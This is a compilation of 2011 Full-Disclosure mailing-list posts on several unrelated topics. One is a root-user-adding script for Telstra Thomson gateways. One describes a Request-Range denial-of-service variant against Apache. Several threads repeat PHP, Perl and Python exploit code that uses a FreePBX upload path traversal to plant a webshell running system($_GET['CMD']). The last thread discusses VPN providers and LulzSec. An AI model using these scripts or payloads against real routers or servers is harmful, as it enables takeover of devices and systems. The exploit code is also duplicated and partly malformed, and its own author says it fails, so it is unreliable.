[Full-disclosure] Telstra thompson gateway - root exploit (0day)
Telstra thompson gateway - root exploit Telstra is an ISP here in Australia, it is also the same isp wich owns the NBN Author: Talon ( #haxnet member) PoC script: script add name addroot command user add name talon password talon role root descr ROOT script run name addroot pars saveall This would add a root user as talon:talon ,with complete control over the gateway and anything running from it. On behalf of talon, before it gets raped by some idling non @. cheers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Telstra Thomson router - news item for CSO.com.au
Hello to those who responded, My MAIN concern with this was the actual reporting of it, and since i am actually a BP customer, it puts me in an awfully compromising position at the moment, as i do not want to end up stuffed up,. for disclosing what shuild have been done maybe a month ago.. albeit, the bug was only found the day i did post it. At the moment, it seems all the gateways on Bigpond are affected... and all the models tested,sofar allow this, leading me to not even test any older models.. It is a bug,it must be fixed... PLEASE read on... it is important. i do not know how else to say this but, PLEASE, patch this up , it is not really any good to people without some knowledge of atleast how a router forwards traffic and manages your internet. For this reason, as i stated earlier In the PoC code. I was genuiley worried about disclosing this, but i had to, because idf rather be on this side of the fence than sitting in the middle not knowing HOW to go about reporting. I have reported atleast 10 bugs on various things, even one freebsd kernel patch is through me, however, those are well structured secuity teams who DONT arrest the person who finds the bugs, rather they are reqarded for at the last disclosure. As you well kow, this could be nasty in the right hands, but at the ssame time, I would like to urge telstra to take the Lead and setup a REAL security team/forum/rules-for-disclosure. I urge CSO/technicolor, to help me do this. The second you have this for me, I would be very happy in future to use those protocols. Please do not point the finger but rather, thank me and thank Talon, for both of us, would never had been disclosed if not for it being discussed first (in chatrooms etc as you well know)...the day it was disclosed was the day it was found.there is NO connections between my channel/chatroom,and any idiots who go around stealing. You have still MUCH time to patch, please try to get this done. Considering that the gateway will add a @bigpond.com to your host, well it is rather huge incentive for scammers,to use legitimate systems, to compromise more. *TechniColor , is another huge company, again, i am glad the replys were made regarding this, and i dont submit anything to www.exploit-db.comrubbish sites. * I would be happy to work with Telstra anytime at NO fee just to secure my own systems. I hope i have cleared abit of why i went about things as i have... i do not want to become another 'cecil' , get my drift ? If i see PROPER protocols in place for people who disclose, i would use them. In the case of technicolor, I am just glad they are now able to get themselfs patched, and again, wopuld be happy to help. FOR Telstra/Bigpond and Iprimus (yes your also affected i believe) ; When i login to my email @home base ISP, i do not see 'security' in the page,clearly. Not last i looked, and this is ofcourse verymuch normal,its time things changed. Maybe it is time that there is some hard-coded (manner of speech) ,rules and protocol for this type of problems.Rather than sniffing routers and sneaking around, yo9u will only find the people who have 0 skills all sending you emails hoping to score a winner... specially after what has happened with cecil. I hope there is a much more visible security section and ebook/pdf wich confirms things in 'paper'. This is why Australia is still one of the biggest targets,and will remain so, unless ISP's start to SPEAK with people, rather than arrest them. In the case of cecil, I have NO pity, he was NO skilled looser,and will always be one.For those who are not though, I think almost every telstra user now at moment, is probably to scared to even do anything online regarding money or even erform some simple scanning/testing,this is thanks to the press coverage of one idiotic kid/truckie or whatever he thinks he was, and i see this just in 'chats', and worse, other countrys are now poking our systems. *This is wrong.* ISP/Companies here in AU,MJST start to setup visible,thorough line and method for those who DO wish to assist and in my case and another ,we both use Bigpond and id hate to be comprmised thru a gateway service. I hope this comes loud and clear, to ALL ISP within Australia ,and hopefully we can get things up-to-date like many countries have done now wich has led to MUCH better disclosure rates,and no arrests because the skilled people will shine through but those who are pathetic will not. Hence you would not get anything bad from this,to setup effective disclosure policy, is security,and should be treated as if it were on and offline,not just online being some cesspit where people are only NOW starting to catchup in AU,thanks to idiots, who do not disclose things like this. I can handle maybe a local kernel exploit,and sure, id even use to test my systems, you do not see those guys going to jail etc... instead, they get paid. This is lwhy most of the world except au,is behind and has been since 1991 thx to a lie tfrom t
Re: [Full-disclosure] Apache Killer
I know this topic is OLD but, i just wonder and, also having spoken to kcope re this myself, discussed the size of each bucket wich can be made to stupendous amounts and using a different vector, ok, instead of Range:bytes= , picture a GET request with as was shown in the code is there, you "Request-Range: bytes=5-,5-69,5-" , now we have bypassed most filters already in place, and the request range code, is exactly the same as range code. Only one person spotted this. Anyhow, This started about byte= 'stupendous' amount but, in the end there is a few ways that people are still using this.. remember it does not need any mod_deflate or mod_gzip to function... i have not tested the method outlined on anything new, but it was pretty nasty on the old systems wich is now made worse if you set the byterange to a high amount from start, rather than sending 0- first... you can just avoid it and stay in the middle and lower it, but the problem can be repeated in some packages, and im retesting using a simple bit of code called create_conns.c and modified GET request. create_conns code is googleable, just google for create_conns.c by n0ah and you have found that app... you can even try a slowloris app and just send one packet. Simple enough to recreate this.. as this is not about 'range' anymore. Also i found this bypasses the filters set by mod_filter wich were 'suggested' and actually added to part of the fix, or some fix's were based on this.. i think that maybe a time to look at some modified code of this, or just setup better traps, better yet, use a patched package, as i do not *think* these are affected, but dont use any of the quick-fixes is what is to be learnt from this exploit in a BIG way. on FreeBSD the httpd on v8.0 was affected so badly, i have never seen a httpd die so badly, as with a flavor of citrix wich was interesting. Anyhow moving on... Anyhow, i know it is old but, i am seeing people still with this problem, who dont realise that some quick-patches, is NOT the way togo... I would assume apache have seen that request-Range exists in the same LINE as range code, does wich is affected, so they would be abit crazy to NOT patch that. I do remember one person showing the affected line in wich request-range was, and i looked it up in my code and bingo, it was same as his example so i assume request-range would be used in a request form. A system GET or POST perhaps... anyhow regardless, i just thought of this and the discussions ive had re this, and think it should be checked 1000% :P Sorry for those who it annoys but, im a fussy fofo on that side of things, ie httpd/ftpd MUST be spankin perfect or i dont rest. Thanks for those who originally and still, help on this topic. Always, thx to kcope for atleast releasing it so it could be patched. <3 and ofcourse, always my buddies on #haxnet@ef, who help me with these discussions. Dos sucks, but hiding from it sucks worse. cheers to all, and specially for those affected by 9/11,my special regards. xd / dru ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?
Just like to point out this is total rubbish, along with the other freePBX
vuln wich was listed and, wich i stupidly wasted time writing a poc for
9wich only works if admin is enabled)
I DID make this in 3 languages, and had it tested, it ONLY ran under admin
conditions...whats so useful then??
I have got the PoC's I made, and i copied the header to a T, it is NOT one
bit different to the example header BUT I ADDED CODE to send it
properly..and to open any 'webshell'
ok lets break it down:
Trustwave's SpiderLabs Security Advisory TWSL2010-005:
FreePBX recordings interface allows remote code execution
^^^here we have code execution (does not say it requires ADMIN todo this and
someone basically at a console, pressing a button for you :P)
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt
Published: 2010-09-23
Version: 1.0
Vendor: FreePBX (http://www.freepbx.org/)
Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it
Version(s) affected: 2.8.0 and below
Product Description:
FreePBX is an easy to use GUI (graphical user interface) that controls and
manages Asterisk, the world's most popular open source telephony engine
software. FreePBX has been developed and hardened by thousands of
volunteers,
has been downloaded over 5,000,000 times, and is utilized in an estimated
500,000 active phone systems.
Source: http://www.freepbx.org
Credit: Wendel G. Henrique of Trustwave's SpiderLabs
CVE: CVE-2010-3490
Finding:
The configuration interface for FreePBX is prone to a remote arbitrary code
execution on the system recordings menu. FreePBX doesn't handle file uploads
in a secure manner, allowing an attacker to manipulate the file extension
and the beginning of the uploaded file name.
The piece of code below, found in page.recordings.php, illustrates part of
the recordings upload feature.
page.recordings.php not accessible or non existent.
/* Code removed to fit better on advisory */
"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
} ?>
/* Code removed to fit better on advisory */
When a file is uploaded, a copy is saved temporarily under the /tmp/
directory, where the name of the file is composed of
user-controlled-staticname.extension, where:
"user-controlled" is $usersnum variable.
"staticname" value is -ivrrecording.
"extension" is controlled by the user.
If $usersnum variable is not defined, then a static string (unnumbered)
is used.
Finally, when the user clicks on the save button on the System Recordings
/// o ok so someone MUSt 'save' it, in PHYSICAL form, this bit, was what
i overlooked in this first adv wth!!!
interface, the file is saved with the original file name provided by the
user under the /var/lib/asterisk/sounds/custom/
directory. /// and bang, sorry but unable to see
this file once yet... abit useful eh ?> guess ppl dont press 'save' to an
unknown,nothing-on-it,recording.
When uploading a file, an attacker can manipulate the $usersnum variable to
perform a path traversal attack and save it anyplace that the web
server /// ok this, i dont really care for, but it is abit useless when
the remote code is really the feature of this
user has access, for example the Apache's DocumentRoot. This allows an
attacker to upload malicious code to the web server and execute it under the
webserver's access permissions.
The HTTP request below illustrates the upload of a phpshell.
POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---5991806838789183981588991120
Content-Length: 116089
-5991806838789183981588991120
Content-Disposition: form-data; name="display"
recordings
-5991806838789183981588991120
Content-Disposition: form-data; name="action"
recordings_start
-5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"
../../../../../var/www/html/admin/SpiderLabs
-5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream
-5991806838789183981588991120--
/// good luck trying to find this and note, now we have to access a file at
where??? lets see
To access the webshell in this example, an attacker would use
the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecord
Re: [Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?
print $sock $buffer;
while ($answer=<$sock>) {
if ($answer=~/defaultStatus="(.*)";/g) {
print $1."\n";
}
if ($answer=~/>/g) {
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/<\/pre><\/td><\/tr>/g){
exit;
} else {
print $answer;
print results "[+] $answer\n";
}
}
}
}
although, my perl is pathetic :P so i dont know if thats right
then i tried in php , and seems to replicate perfectly... and again, no
file-ivrrecordings.php appearing :s
http://101.11.1.11/\r\n";;
$part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
$part1 .= "Authorization: Basic base64auth\r\n";
$part2 .= "Content-Type : multipart/form-data;\r\n";
$part2 =
"boundary=-5991806838789183981588991120--\r\n";
$part2 .= "Content-Type : multipart/form-data;\r\n";
$part2 =
"boundary=-5991806838789183981588991120--\r\n";
$part2 = "Content-Length: 116089\r\n";
$part2 .= "\r\n";
$part2 .=
"-5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"display\"\r\n";
$part2 .= "\r\n";
$part2 .= "recordings\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
$part2 .= "\r\n";
$part2 .= "recordings_start\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"usersnum\"\r\n";
$part2 .= "\r\n";
$part2 .= "Content-Disposition: form-data;
name=\"../../../../../var/www/html/xd/\"\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
filename=\"shell.php\"\r\n";
$part2 .= "Content-Type: application/octet-stream\r\n";
$part2 .= "\r\n";
$part2 .= "\' + system(\'$code\') + \'\';
?>\r\n";
$part2 .=
"-5991806838789183981588991120--\r\n";
$part1 .= $part2;
fwrite($socket, $part1);
echo "[!] Check the upload folder (/var/www/html/xd) ..";
} else {
echo "\n\n";
echo
"+---+\r\n";
echo "|Usage: php exploit.php site.com |\r\n";
echo
"+---+\r\n";
echo "\n\n";
}
?>
In the php one i tried using a different folder... what is it , the server
is NOT patched.
I may have missed something, but i was able to replicate the EXACT header
shown in the spiderlabs, and on this system, nothing showed. It is hand
patched, so im beginning to wonder if somehow the owner has fluked this one
:? (thatd b great really), but there is a bug still, if not this one, then
another one wich is allowing problems for me.
i will have to read as there seems to be a few more emails on this, thankyou
for your input, i will have to test again or look at the code and makesure
it is right.. i hurried this but the python exploit code, was already made
for this PoC, i was given that.
This box is just VOiP of headaches.
Thanks for your assistance,and thankyou for those xss bugs, i may have to
test for those also, altho the problem seems more serious than that.
xd
www.crazycoders.com / #haxnet@Ef
On 18 September 2011 03:58, Grandma Eubanks wrote:
> So, I found several FreePBX vulnerabilities about a week before SpiderLabs
> came out with this new PoC (which I can't believe I missed).
> http://seclists.org/fulldisclosure/2010/Jul/180
> Now, you can use my LFI and transport particular files to a TFTP accessible
> path, assuming TFTP is enabled on that server (which it seems to be in most
> of the cases).
>
> As for the vulnerability you're using...how exact are you being? Take a
> look at the code:
> $dest = "{$usersnum}-";
> $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
> move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
>
> Alright, so the usernumber is a user definable value and there was no check
> to make sure this was an actual integer. So the problem here is you're
> allowed to specify a path to upload a file to. Now, let's take a look at
> what you put for your path:
>
> Content-Disposition: for
[Full-disclosure] Fwd: FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?
print $sock $buffer;
while ($answer=<$sock>) {
if ($answer=~/defaultStatus="(.*)";/g) {
print $1."\n";
}
if ($answer=~/>/g) {
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~/<\/pre><\/td><\/tr>/g){
exit;
} else {
print $answer;
print results "[+] $answer\n";
}
}
}
}
although, my perl is pathetic :P so i dont know if thats right
then i tried in php , and seems to replicate perfectly... and again, no
file-ivrrecordings.php appearing :s
http://101.11.1.11/\r\n";;
$part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
$part1 .= "Authorization: Basic base64auth\r\n";
$part2 .= "Content-Type : multipart/form-data;\r\n";
$part2 =
"boundary=-5991806838789183981588991120--\r\n";
$part2 .= "Content-Type : multipart/form-data;\r\n";
$part2 =
"boundary=-5991806838789183981588991120--\r\n";
$part2 = "Content-Length: 116089\r\n";
$part2 .= "\r\n";
$part2 .=
"-5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"display\"\r\n";
$part2 .= "\r\n";
$part2 .= "recordings\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
$part2 .= "\r\n";
$part2 .= "recordings_start\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"usersnum\"\r\n";
$part2 .= "\r\n";
$part2 .= "Content-Disposition: form-data;
name=\"../../../../../var/www/html/xd/\"\r\n";
$part2 .=
"---5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
filename=\"shell.php\"\r\n";
$part2 .= "Content-Type: application/octet-stream\r\n";
$part2 .= "\r\n";
$part2 .= "\' + system(\'$code\') + \'\';
?>\r\n";
$part2 .=
"-5991806838789183981588991120--\r\n";
$part1 .= $part2;
fwrite($socket, $part1);
echo "[!] Check the upload folder (/var/www/html/xd) ..";
} else {
echo "\n\n";
echo
"+---+\r\n";
echo "|Usage: php exploit.php site.com |\r\n";
echo
"+---+\r\n";
echo "\n\n";
}
?>
In the php one i tried using a different folder... what is it , the server
is NOT patched.
I may have missed something, but i was able to replicate the EXACT header
shown in the spiderlabs, and on this system, nothing showed. It is hand
patched, so im beginning to wonder if somehow the owner has fluked this one
:? (thatd b great really), but there is a bug still, if not this one, then
another one wich is allowing problems for me.
i will have to read as there seems to be a few more emails on this, thankyou
for your input, i will have to test again or look at the code and makesure
it is right.. i hurried this but the python exploit code, was already made
for this PoC, i was given that.
This box is just VOiP of headaches.
Thanks for your assistance,and thankyou for those xss bugs, i may have to
test for those also, altho the problem seems more serious than that.
xd
www.crazycoders.com / #haxnet@Ef
On 18 September 2011 03:58, Grandma Eubanks wrote:
> So, I found several FreePBX vulnerabilities about a week before SpiderLabs
> came out with this new PoC (which I can't believe I missed).
> http://seclists.org/fulldisclosure/2010/Jul/180
> Now, you can use my LFI and transport particular files to a TFTP accessible
> path, assuming TFTP is enabled on that server (which it seems to be in most
> of the cases).
>
> As for the vulnerability you're using...how exact are you being? Take a
> look at the code:
> $dest = "{$usersnum}-";
> $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
> move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
>
> Alright, so the usernumber is a user definable value and there was no check
> to make sure this was an actual integer. So the problem here is you're
> allowed to specify a path to upload a file to. Now, let's take a look at
> what you put for your path:
>
> Content-Disposition: for
Re: [Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?
Hello,
Yes i noticed this last night, and have not yet recoded a PoC using the full
path, but to make one using your xss, i might have to modify abit
more...hmm, im only testing one box wich was busted/broken up by a 'breakin'
, thats why, am trying to figure how... but yes, there is more bugs than
just this, i will relook at the tested poc with your comments and actually,
i should have picked that up from the broken poc, i actually did, wonder why
the trustwave/spiderlabs vulns showed one path yet posted to another... then
i saw another apparent rfi, and this aapprently needed 'admin'
credentials...so i thought this was possibly also the case with the...rather
broken SpiderLabs poc...as i thought it was...however, thankyou, i am not so
confident with php and the whole rfi thing, so i am basically trying to fix
and patch a brken box...atleast i have enough code snippets to fix some
problems,... one of those PoC was not written by me so there is
definately 'in the wild' exploits for this... no doubt. I just want to patch
this one box and gtfo of dodge.
anyhow cheers, ill redo the poc and test again..
regards,
xd
On 19 September 2011 03:28, Grandma Eubanks wrote:
> Well, my disclosures involved one boring xss bug and several other more
> interesting ones like grabbing the config file. I wouldn't of disclosed if
> it was just reflected xss.
>
> Anyway, I still don't understand what you're trying to do. You're not even
> posting to the correct page that has the form you're trying to exploit.
> You're still stuck on their PoC and not the vulnerability information. Yes,
> their PoC is seemingly wrong.
>
> POST /admin/config.php
>
> But, vulnerability lies in /recordings/page.recordings.php
>
> Also, use my full path disclosure problem to see if it's even installed in
> the default directory of /var/www/.
>
> On Sat, Sep 17, 2011 at 3:51 PM, xD 0x41 wrote:
>
>> Hello,
>> Thankyou for your input regarding this, the issue is not a matter of
>> where to put files, nor of LFI, it is more of 'why is this PoC made for
>> non-user accounts,and can it be used remotely by attackers'.
>>
>> I have written 3 or so PoC's for this and also for another bug in this,
>> they can b found here:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> ##s.connectHTTPS((host,port))
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile";
>> filename="webshell.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '\'
Re: [Full-disclosure] FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?
hmmm i am looking at your actual advisory, i downloaded it and am reading
it, i am not to good with the old php, and i am babit confused on how to
find if the install is default, although i can see an example, i dont know
if this would need to be regex'd or not.. or if i have to use script() type
xss to recover it, from one of the other xss you showed... I will try tho,
thats rather disturbing the persistent xss you showed, kinda nasty if used
right... very nice adv btw. I needed that.
cheers,
xd
On 19 September 2011 03:28, Grandma Eubanks wrote:
> Well, my disclosures involved one boring xss bug and several other more
> interesting ones like grabbing the config file. I wouldn't of disclosed if
> it was just reflected xss.
>
> Anyway, I still don't understand what you're trying to do. You're not even
> posting to the correct page that has the form you're trying to exploit.
> You're still stuck on their PoC and not the vulnerability information. Yes,
> their PoC is seemingly wrong.
>
> POST /admin/config.php
>
> But, vulnerability lies in /recordings/page.recordings.php
>
> Also, use my full path disclosure problem to see if it's even installed in
> the default directory of /var/www/.
>
> On Sat, Sep 17, 2011 at 3:51 PM, xD 0x41 wrote:
>
>> Hello,
>> Thankyou for your input regarding this, the issue is not a matter of
>> where to put files, nor of LFI, it is more of 'why is this PoC made for
>> non-user accounts,and can it be used remotely by attackers'.
>>
>> I have written 3 or so PoC's for this and also for another bug in this,
>> they can b found here:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> ##s.connectHTTPS((host,port))
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile";
>> filename="webshell.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n'
>> '-5991806838789183981588991120--\r\n'
>>
>>
>> Then i found it did not work , and i KNOW there is a bug affecting things
>> for this area of boxes... I cannot say alot more about that but i will only
>> say, there is bugs still affecting this, and im trying to secure one box
>> only for a client... so what credentials do i need?
>> anyhow, there is also one wich i tried in perl wich i have now made
>> connect to both ports 80/443 and try, this seems to be pretty accurate...yet
>> a
Re: [Full-disclosure] Fwd: FreePBX Unfounded RCE PoC or rather Misguided PoC maybe ?
OK well, after trying again with the php code, but corrected php code, i
still was not able to reproduce the bug... dont think your right about it,
maybe right about the poc being wrong, and sure looks rlike there should be
problems, but doesnt seem to be... i might try coding it in perl.. but i
dont think it is possible to save a page.. maybe execute a command, but i
dont think can execute the command afterwards,ie, saved shell.php with
nothing inh it but
i will try fix it..
but i think there is still more around wich is not being shown, and the code
probably needs a good audit.
xd
On 19 September 2011 03:28, Grandma Eubanks wrote:
> Well, my disclosures involved one boring xss bug and several other more
> interesting ones like grabbing the config file. I wouldn't of disclosed if
> it was just reflected xss.
>
> Anyway, I still don't understand what you're trying to do. You're not even
> posting to the correct page that has the form you're trying to exploit.
> You're still stuck on their PoC and not the vulnerability information. Yes,
> their PoC is seemingly wrong.
>
> POST /admin/config.php
>
> But, vulnerability lies in /recordings/page.recordings.
> php
>
> Also, use my full path disclosure problem to see if it's even installed in
> the default directory of /var/www/.
>
>
> On Sat, Sep 17, 2011 at 3:58 PM, xD 0x41 wrote:
>
>> Hello,
>> Thankyou for your input regarding this, the issue is not a matter of
>> where to put files, nor of LFI, it is more of 'why is this PoC made for
>> non-user accounts,and can it be used remotely by attackers'.
>>
>> I have written 3 or so PoC's for this and also for another bug in this,
>> they can b found here:
>> #!/usr/bin/env python
>> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>>
>> host = $host
>> port = 80
>>
>> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
>> ##s.connectHTTPS((host,port))
>> s.connectHTTP((host,port))
>> s.send(
>> 'POST /admin/config.php HTTP/1.1\r\n'
>> 'Host: ' + host + '\r\n'
>> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
>> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
>> 'Accept:
>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
>> 'Accept-Language: en-us,en;q=0.5\r\n'
>> 'Accept-Encoding: gzip,deflate\r\n'
>> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
>> 'Keep-Alive: 300\r\n'
>> 'Proxy-Connection: keep-alive\r\n'
>> 'Referer: http://' + host + '/admin/config.php\r\n'
>> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
>> 'Authorization: Basic base64auth\r\n')
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Type: multipart/form-data;\r\n'
>> 'boundary=---5991806838789183981588991120\r\n'
>> 'Content-Length: 116089\r\n'
>> '\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="display"\r\n'
>> '\r\n'
>> 'recordings\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="action"\r\n'
>> '\r\n'
>> 'recordings_start\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="usersnum"\r\n'
>> '\r\n'
>> '../../../../../var/www/html/admin/zmeu.php\r\n'
>> '-5991806838789183981588991120\r\n'
>> 'Content-Disposition: form-data; name="ivrfile";
>> filename="webshell.php"\r\n'
>> 'Content-Type: application/octet-stream\r\n'
>> '\r\n'
>> '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n'
>> '-5991806838789183981588991120--\r\n'
>>
>>
>> Then i found it did not work , and i KNOW there is a bug affecting things
>> for this area of boxes... I cannot say alot more about that but i will only
>> say, there is bugs still affecting this, and im trying to secure one box
>> only for a client... so what credentials do i need?
>> anyhow, there is also one wich i
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
They advertised as anonymous VPN to 'everyone'. Then, that would mean, especially NOT locally, thats something wich is also, subject to federal laws though so, in its own country, the provider may have to, nomatter whats advertised, BUT outside of country customers, should not be handed over. isp's here dont do it, and havent, for like 20 yrs, they also do not take down people,issue nor execute other peoples 'takedown orders', there is many reasons for this but basically, they loose money from it. Anyhow, in UK, you maybe right, but outside of there, then, they should have maybe not advertised as anononymous vpn services for everyone and anyone. thats obvious crap we know now. anyhow, cheers, xd On 29 September 2011 22:45, Benji wrote: > Im sorry, why is it 'worrying' that a vpn provider that was a UK business > and was located in the UK, is subject to UK law? > > > > On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn < > d.martyn.fulldisclos...@gmail.com> wrote: > >> Again, I hope this does not fail to send. >> The reasoning behind the "Pure Elite" recruitment channel was A: to >> recruit some talented people (and, by all accounts, there were some talented >> programmers there) and B: development and idle talk. Now more interesting >> was the reasoning behind the name - by putting the developers and coders and >> potential recruits in a channel named "Pure Elite", it was essentially an >> ego boost for the new guys, made them feel valued, etc, when in fact most >> were but pawns to be used (IMHO). >> >> This co-operation between VPN providers and LEO, while being nothing new - >> remember how hushmail caved in - is indeed worrying for those of us who are >> privacy advocates as well as security researchers. >> >> On a more direct note, Laurelei, do not presume that you know all there is >> to know about them. Doing so would be foolish. (Now don't go assuming that I >> hate you, I bear you bugger all ill-will, etc). >> Good day. >> >> >> On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm wrote: >> >>> Its all good dude. What really concerns me is that vpn providers might >>> give over logs to oppressive regemes. TOR is starting to look better and >>> better. >>> On Sep 27, 2011 11:40 PM, "GloW - XD" wrote: >>> > never did... was only for one buttcheek kid that i was alittle pissed >>> and >>> > thinking things wich, prolly were wrong at the time... >>> > I am adult enough to apologise for what happened back then, and >>> hopefully it >>> > is just, 